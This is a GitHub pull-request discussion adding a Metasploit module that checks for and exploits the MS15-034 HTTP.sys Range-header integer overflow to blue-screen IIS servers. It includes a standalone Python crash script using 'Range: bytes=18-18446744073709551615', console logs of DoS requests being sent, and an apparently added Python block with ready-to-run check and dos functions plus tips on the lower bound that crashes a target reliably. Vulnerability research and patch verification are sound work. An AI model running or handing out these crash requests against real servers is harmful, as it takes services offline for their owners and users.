
Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service (and check) #5150

Merged (9 commits) Apr 15, 2015

Conversation

@wchen-r7 (Contributor) commented Apr 15, 2015

I didn't do much, I found a work-in-progress code here: http://pastebin.com/raw.php?i=ypURDPc4

I tested it and it worked on my IIS:

[screenshot omitted]

So I ported that to Metasploit. This MSF module can do two things:

  1. It can check if the target is vulnerable or not (if you use the check command)
  2. It can DoS the target (if you use the run command, but the check will kick in first)

Here's how you can test it:

  • Set up a Windows 7 SP1 box
  • Install IIS
  • Open IIS Manager, click on Default Web Site. You will see Output Caching there, double click on that, and then on the right you will see Edit Feature Settings: Make sure "Enable kernel cache" is enabled. By default it already is.
  • I added a .htm extension for kernel-mode caching too during testing, but this may not be necessary.
  • Run the module
msf auxiliary(ms15_034_ulonglongadd) > run

[*] 192.168.1.169:80 - DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Or if you see me in person, you can use my box, too.
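As an added example (not the PR's Ruby module and not code from anyone in this thread), here is the same check/run split in plain Python 3 with sockets only, so the classification logic can be exercised offline. Assumptions, since the page does not spell them out: the classifier keys on the widely circulated curl probe behaviour, where an unpatched HTTP.sys answers the oversized Range with 416 "Requested Range Not Satisfiable" and a patched one rejects the header with 400 and the text "The request has an invalid header name"; the check uses a lower bound of 0, which is what keeps it from crashing the target, while the crash request needs a non-zero lower bound that lies inside a resource the kernel-mode cache already holds. The randomised User-Agent, the sample responses and all function names are mine.

```python
import secrets
import socket

HUGE = 18446744073709551615  # 2**64 - 1: the upper bound that overflows the add

def random_user_agent():
    # Fresh token per probe, so a cache keyed on an earlier probe's User-Agent
    # cannot hand back a stale (pre-patch) answer when you retest.
    return "Mozilla/5.0 (probe " + secrets.token_hex(4) + ")"

def _request(path, host, byte_range, user_agent=""):
    ua = user_agent or random_user_agent()
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {ua}\r\n"
        f"Range: bytes={byte_range}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")

def build_check_request(path, host, user_agent=""):
    """Non-crashing probe: lower bound 0 (assumption: that is what keeps it safe)."""
    return _request(path, host, f"0-{HUGE}", user_agent)

def build_dos_request(path, host, lower, user_agent=""):
    """Crash request: lower bound must be > 0 and inside the cached resource."""
    if lower <= 0:
        raise ValueError("lower bound must be > 0 and within the cached file")
    return _request(path, host, f"{lower}-{HUGE}", user_agent)

def parse_response(raw):
    """Return (status, reason, body) from one raw HTTP/1.x response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP status line")
    reason = parts[2] if len(parts) == 3 else ""
    return int(parts[1]), reason, body.decode("latin-1", "replace")

def classify(raw):
    """'vulnerable', 'patched' or 'unknown' for the answer to a check request."""
    try:
        status, reason, body = parse_response(raw)
    except ValueError:
        return "unknown"
    text = reason + " " + body
    if status == 416 and "Requested Range Not Satisfiable" in text:
        return "vulnerable"
    if status == 400 and "invalid header name" in text:
        return "patched"
    return "unknown"  # not HTTP.sys, a proxy in the way, or something else

def send_raw(host, port, payload, timeout=5.0):
    """Send one request and read until close or timeout (a crashed host never answers)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)

def check(host, port=80, path="/", vhost=None):
    """What the module's `check` does: send the safe probe and classify the answer."""
    return classify(send_raw(host, port, build_check_request(path, vhost or host)))

def dos(host, port=80, path="/iisstart.htm", lower=18, vhost=None, attempts=3):
    """What `run` does: populate the kernel cache, then fire the crash request a few times."""
    hdr = vhost or host
    send_raw(host, port, f"GET {path} HTTP/1.0\r\nHost: {hdr}\r\n\r\n".encode("ascii"))
    for _ in range(attempts):
        try:
            send_raw(host, port, build_dos_request(path, hdr, lower))
        except OSError:
            return True  # refused or reset: the host has most likely gone down
    return False

# Constructed sample answers for offline testing; not captured from a real host.
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\nServer: Microsoft-HTTPAPI/2.0\r\n\r\n"
    b"<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE></HEAD></HTML>"
)
SAMPLE_PATCHED = (
    b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/html; charset=us-ascii\r\n\r\n"
    b"<HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><h2>Bad Request</h2>"
    b"<hr>The request has an invalid header name</BODY></HTML>"
)
SAMPLE_OTHER = b"HTTP/1.1 206 Partial Content\r\nContent-Length: 5\r\n\r\nhello"
```

`check("192.168.1.169")` returns one of the three strings; treat "unknown" as "no verdict", not as "safe": a non-HTTP.sys server, a front-end proxy or a WAF that rewrites error pages all land there. A 416 coming from something in front of the target is the false-positive case, so confirm a "vulnerable" result against a second static path or with a fresh User-Agent before reporting it.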

@wchen-r7 wchen-r7 changed the title This module will check for MS15-034 (CVE-2015-1635) https.sys Request Handling Vulnerability Add MS15-034 (CVE-2015-1635) https.sys Request Handling Vulnerability Apr 15, 2015
@andresriancho commented Apr 15, 2015

@wchen-r7 does this test crash the remote IIS / OS?

@andresriancho commented Apr 15, 2015

I think I've found the answer here: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/?hn

When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.

@wchen-r7 (Contributor, Author) commented Apr 15, 2015

@andresriancho Hmm, it never DOS'd my IIS boxes (I had 3 for testing at the time). But let me double check again, this time I'll try more requests... bbl.

@FireFart (Contributor) commented Apr 15, 2015

I tried the exploit against a bunch of servers at work and none of them crashed. Maybe you need a special configuration so the blue screen is triggered.

@wchen-r7 (Contributor, Author) commented Apr 15, 2015

So Bill and I tested the code against Windows 7. I tried testing on Windows Server 2008 (32-bit) and that didn't work for me. Another box with 403 everything couldn't either. I have heard binary_raider saying the code works for Windows Server 2012: https://twitter.com/binary_raider/status/588260892707545088

@wchen-r7 (Contributor, Author) commented Apr 15, 2015

Another test: 1000 requests and no DOS. Maybe like @FireFart said, has to be something specific.

@wchen-r7 (Contributor, Author) commented Apr 15, 2015

I found a guy saying it DOS'd for him: http://www.reddit.com/r/netsec/comments/32n3m2/cve20151635_rce_in_windows_httpsys/cqd680s

So I'm gonna go ahead and add this in the description. Thanks all.

@FireFart (Contributor) commented Apr 15, 2015

Here is a video of a bluescreen on win2k12
https://www.youtube.com/watch?v=BlBXREzsytc&feature=youtu.be

@wchen-r7 (Contributor, Author) commented Apr 15, 2015

@FireFart Good find. Thanks!

@FireFart (Contributor) commented Apr 15, 2015

Tried the output caching on win2k8 but I still can't trigger the BSOD. I currently have no admin access to a win2k12 to try it out :(

return
end

if !res.headers['Server'].include?('Microsoft-IIS')
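Review bot: `res.headers['Server']` is nil whenever the target omits the Server header, so `.include?` raises NoMethodError and the check aborts instead of returning a result; at minimum write `res.headers['Server'].to_s.include?('Microsoft-IIS')`. Since the header can be removed or spoofed and the Range probe that follows is the decisive test anyway, the cleaner fix is to drop this header test entirely rather than turn every hardened IIS into a false negative.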

@Meatballs1 (Contributor) Apr 15, 2015

People may disable the server header. So maybe null, and also false negative.

Also may spoof it :)

@wchen-r7 (Author, Contributor) Apr 15, 2015

That's true. I think I'm just going to get rid of this check. It doesn't feel important when it has a more explicit way to check.

Thanks.

@Meatballs1 (Contributor) commented Apr 15, 2015

This won't cause a BSOD, try Range: bytes=18-18446744073709551615 instead

@Meatballs1 (Contributor) commented Apr 15, 2015

n.b. can this be written as an auxiliary/dos/ module with a check?

@jamie-34254 commented Apr 15, 2015

You need to actually have some output caching rules enabled for this to work

@Meatballs1 (Contributor) commented Apr 15, 2015

Worked for me against Windows 7 with default install of IIS... Did take a few triggers to BSOD.

@jamie-34254 commented Apr 15, 2015

What does your "Output Caching" tab show? Before I could get the exploit to work I had to add a rule to Output Caching to cache stuff to the Kernel-mode cache.

'Description' => %q{
This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A
vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code
execution. Please note this module could potentially cause a denail-of-service against

@Meatballs1 (Contributor) Apr 15, 2015

denial

@Meatballs1 (Contributor) commented Apr 15, 2015

@wchen-r7 has this covered:

Open IIS Manager, click on Default Web Site. You will see Output Caching there, double click on that, and then on the right you will see Edit Feature Settings: Make sure "Enable kernel cache" is enabled. By default it already is.

@phillips321 commented Apr 15, 2015

That youtube vid is mine, i have 2012r2x64 and 2008r2x64 here to test against. 2008r2x64 didn't blue screen, it just caused the box to lock up. 2012r2x64 resulted in BSOD. I've heard people saying caching needs to be enabled and populated to be vuln..... oh, and Hi Meatballs!

res = send_request_raw({
'uri' => uri,
'method' => 'GET',
'vhost' => 'stuff',
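Review bot: the hardcoded `'vhost' => 'stuff'` overrides whatever the user put in VHOST, so a target behind a name-based virtual host or a load-balancer VIP is probed with a Host header that may route to a different site (or a 400) and the check result no longer describes the host you meant. Remove the key; the HttpClient mixin then defaults the Host header to the VHOST option, falling back to RHOST, which is the behaviour every other HTTP module relies on.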

@TomSellers (Contributor) Apr 15, 2015

The module has a vhost option that doesn't appear to be used. Should this be changed in order to support VIP/virtual hosts?

@wchen-r7 (Author, Contributor) Apr 15, 2015

Actually I don't really need this, I'll get rid of this line. Thanks.

@julianvilas (Contributor) commented Apr 15, 2015

This is supposed to give blue screen

```python
# Tested on Win Srv 2012R2.
import socket
import sys

if len(sys.argv) <= 1:
    sys.exit('Give me an IP')

Host = sys.argv[1]


def SendPayload(Payload, Host):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((Host, 80))
    s.send(Payload)          # Payload is bytes, so this runs on Python 2 and 3
    try:
        s.recv(1024)         # a target that has crashed never answers
    except socket.timeout:
        pass
    s.close()


# Make sure iisstart.htm exists. The first request gets the file into the
# kernel-mode cache, the second sends the Range whose upper bound overflows.
Init = b"GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = (b"GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\n"
           b"Range: bytes=18-18446744073709551615\r\n\r\n")

SendPayload(Init, Host)
SendPayload(Payload, Host)
```

via: https://twitter.com/PythonResponder/status/588364311422181376

@wchen-r7 wchen-r7 changed the title Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service (and check) Apr 15, 2015
@jvazquez-r7 jvazquez-r7 self-assigned this Apr 15, 2015
@jvazquez-r7 jvazquez-r7 merged commit 76d36a4 into rapid7:master Apr 15, 2015
jvazquez-r7 added a commit that referenced this pull request Apr 15, 2015
* `check` to test, `run` to DoS
@jvazquez-r7 (Contributor) commented Apr 15, 2015

Test:

msf auxiliary(ms15_034_ulonglongadd) > set rhosts 10.6.0.96
rhosts => 10.6.0.96
msf auxiliary(ms15_034_ulonglongadd) > check
[+] 10.6.0.96:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(ms15_034_ulonglongadd) > run

[*] 10.6.0.96:80 - DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Thanks @wchen-r7 !

'Description' => %q{
This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A
vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code
execution. This module will try to cause a denail-of-service.

@dmiller-nmap Apr 15, 2015

Spelling here: s/denail/denial/

@wchen-r7 (Author, Contributor) Apr 15, 2015

ah man. I need a spell checker for my text editor.

@wchen-r7 (Author, Contributor) Apr 15, 2015

Correction submitted: #5155

Thanks.

@todb-r7 (Contributor) commented Apr 15, 2015

thank YOU @wchen-r7 for the quick turnaround on the PoC.

@HsSec commented Apr 15, 2015

Is it possible with this vuln to execute shellcode (a Meterpreter stager)?

@altonius commented Apr 16, 2015

Has anyone had any luck with running this against the WinRM service, which runs an HTTP service? Could be another avenue to try.

@FireFart (Contributor) commented Apr 16, 2015

Here is a translated version of an analysis:
https://translate.google.com/translate?hl=en&sl=zh-CN&tl=en&u=http%3A%2F%2Fblogs.360.cn%2Fblog%2Fcve_2015_6135_http_rce_analysis&sandbox=1

It says "So, for iisstart.htm, lower >= 310 and < 647 can stabilize the trigger BSOD" (in Google Translate English).

Maybe we can try this out?

@wchen-r7 (Contributor, Author) commented Apr 16, 2015

Yes we can try. I can work on this again this Friday.

@snobu commented Apr 16, 2015

From @Lee_Holmes:

MS015-034 vulnerability requires that services use Kernel Mode Caching in http.sys. WinRM and PowerShell Remoting do not.

https://twitter.com/Lee_Holmes/status/588464652708806656

@L34Rn commented Apr 16, 2015

blue screen on 2008r2 iis7.5

@Meatballs1 (Contributor) commented Apr 16, 2015

From @Lee_Holmes:

MS015-034 vulnerability requires that services use Kernel Mode Caching in http.sys. WinRM and PowerShell Remoting do not.

Network Discovery 5357 is also a HTTP.sys service, but was also not vuln. 😢

You can list available HTTP.sys services with netsh http show iplisten

@TomSellers (Contributor) commented Apr 16, 2015

I don't see any results on that command but someone on twitter, I forget who, provided this one:

netsh http show servicestate

and look for Registered URLS. This seems to provide usable data in my environment.

@KevinBeaumont commented Apr 17, 2015

One note on SANS FAQ - just because something uses HTTP.sys, doesn't mean it's vuln to this. Kernel Mode Caching has to be called, which is pretty rare - e.g. IIS uses it for caching static content, and that's basically it.

Also to clear up another common misconception, this is not an RCE issue. It's a single integer overflow. Stop buying into the Qualys etc hype - they're just speculating.

@Meatballs1 (Contributor) commented Apr 17, 2015

Doh I meant servicestate :D

N.b. pics on twitters of the tcp traffic indicates a memory leak - after the end of the response...

@snobu commented Apr 17, 2015

Easily parsable with a PowerShell oneliner.

PS> $(netsh http show servicestate) -match 'HTTP' -replace ' ', '' | select -Skip 1
HTTP://+:5985/WSMAN/
HTTP://+:47001/WSMAN/
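As an added example (not code from anyone in this thread), here is a Python 3 parser for the output of `netsh http show servicestate` that does what the one-liner above does but returns structured records and turns the `+` (strong) and `*` (weak) wildcard bindings into concrete probe targets for the check. The sample text is constructed to the shape of that output, using the two WSMAN URLs printed above plus two assumed IIS reservations; every field other than the `Registered URLs:` lines is an assumption and is ignored by the parser, which only keys on lines of the form `HTTP(S)://host:port/path`.

```python
import re
from collections import namedtuple

Listener = namedtuple("Listener", "scheme host port path")

# Constructed sample, shaped like `netsh http show servicestate` output.
# Only the URL lines matter to the parser; the rest is illustrative.
SAMPLE_SERVICESTATE = """\
Snapshot of HTTP service state (Server Session View):
-----------------------------------------------------

Server session ID: FF00000020000001
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Request queue name: Request queue is unnamed.
        Properties:
            Number of registered URLs: 2
            Registered URLs:
                HTTP://+:5985/WSMAN/
                HTTP://+:47001/WSMAN/

Server session ID: FF00000020000002
    Version: 2.0
    State: Active
    URL groups:
    URL group ID: FE00000040000002
        Properties:
            Number of registered URLs: 2
            Registered URLs:
                HTTP://+:80/
                HTTPS://*:443/
"""

# scheme :// host (or bracketed IPv6) : port /path, whole line, case-insensitive
_URL = re.compile(r"^\s*(HTTPS?)://(\[[^\]]+\]|[^:/\s]+):(\d+)(/\S*)\s*$", re.IGNORECASE)


def parse_registered_urls(text):
    """Return the distinct HTTP.sys URL reservations found in the netsh dump, in order."""
    seen, out = set(), []
    for line in text.splitlines():
        m = _URL.match(line)
        if not m:
            continue
        rec = Listener(m.group(1).lower(), m.group(2), int(m.group(3)), m.group(4))
        if rec not in seen:
            seen.add(rec)
            out.append(rec)
    return out


def probe_targets(listeners, address):
    """Map reservations to (scheme, host, port, path) tuples you can actually connect to.
    '+' and '*' bind every local address, so they are replaced by the address given;
    a reservation on a specific hostname or IP is kept as-is."""
    return [
        (ln.scheme, address if ln.host in ("+", "*") else ln.host, ln.port, ln.path)
        for ln in listeners
    ]
```

The list this produces is scope, not a verdict: as Kevin Beaumont and the quoted Lee Holmes tweet say above, a listener is only exposed if it serves content through HTTP.sys kernel-mode caching, which in practice means IIS static files, so the WSMAN entries on 5985 and 47001 belong on the list of things to probe and then rule out, not on a findings list.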
@wiredaem0n commented Apr 17, 2015

A standalone python version.
http://pastebin.com/PpX8QS3y

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request May 6, 2015
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in rapid7#5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys

Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in rapid7#5192, @joevennix's module for Safari CVE-2015-1126

Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in

Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in rapid7#5016,
add SSL Labs scanner

Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in rapid7#5101, Add Directory Traversal for GoAhead Web Server

Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in rapid7#5158, OWA internal IP disclosure scanner

Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in rapid7#5159, WordPress Mobile Edition Plugin File Read Vuln

Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in rapid7#4924, @m-1-k-3's DLink CVE-2015-1187 exploit

Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in rapid7#5131, WordPress Slideshow Upload

Edited modules/exploits/windows/local/run_as.rb first landed in rapid7#4649,
improve post/windows/manage/run_as and as an exploit

(These results courtesy of a delightful git alias, here:

```
  cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"

```

So that's kind of fun.
@erwanlr (Contributor) commented May 11, 2015

Small update on that one:

I tested a client's server using a custom script and the MSF module to check it, both reported the target as vulnerable. Then, the client applied the patch and I retested it with the same stuff and cURL.

cURL reported it as fixed, the two others as vulnerable. After investigation, the remote server was still sending the cached response for my custom script and MSF based on the UserAgent being used.

e.g:

msf auxiliary(ms15_034_ulonglongadd) > check
[+] X.X.X.X:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)


msf auxiliary(ms15_034_ulonglongadd) > set UserAgent 'Hello'
UserAgent => Hello
msf auxiliary(ms15_034_ulonglongadd) > check
[*] X.X.X.X:80 - The target is not exploitable.
[*] Checked 1 of 1 hosts (100% complete)

Not sure if this is the behaviour for all IIS or just a weird one I got :x

Anyway, it might be useful to add a random string to the UA to avoid such FP when retesting :)

@wchen-r7 (Contributor, Author) commented May 11, 2015

Thanks for the info!

@wchen-r7 (Contributor, Author) commented May 12, 2015

@erwanlr Hmm I'm not able to reproduce the behavior you described.

Here's the vulnerable response:

msf auxiliary(ms15_034_ulonglongadd) > check
[+] 192.168.1.138:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)

Here's the patched response:

msf auxiliary(ms15_034_ulonglongadd) > check
[*] 192.168.1.138:80 - The target is not exploitable.
[*] Checked 1 of 1 hosts (100% complete)

Is it possible to give me more precise steps to reproduce this? (Including the server setup)

@erwanlr (Contributor) commented May 12, 2015

I retested using the exact same options (RHOSTS, VHOST and TARGETURI - was a css file -, all others were default values) and noticed that it was still reported as vulnerable whereas using cURL it wasn't.

Then, after playing with burp to determine what was going on, I found that when using the same User-Agent as the first check, the cached response was received.

I don't know the server setup unfortunately, all I can say is that it was an IIS 7.5 (but that won't really help :/)

If it was affecting all IIS, other people would have reported such weird behaviour, so I assume I just hit a unicorn :O

@wchen-r7 (Contributor, Author) commented May 12, 2015

OK, thanks! I will keep an eye on this and try to reproduce again.

@TomSellers (Contributor) commented May 12, 2015

If I recall correctly the patch requires a reboot. If the response is cached it is unlikely to be from the target. Perhaps a proxy? Or a test against a patched but not rebooted server?

Tom


@erwanlr (Contributor) commented May 12, 2015

Ahhh, that must be the not rebooted server case as it was fixed during testing and the client didn't inform me of such thing.
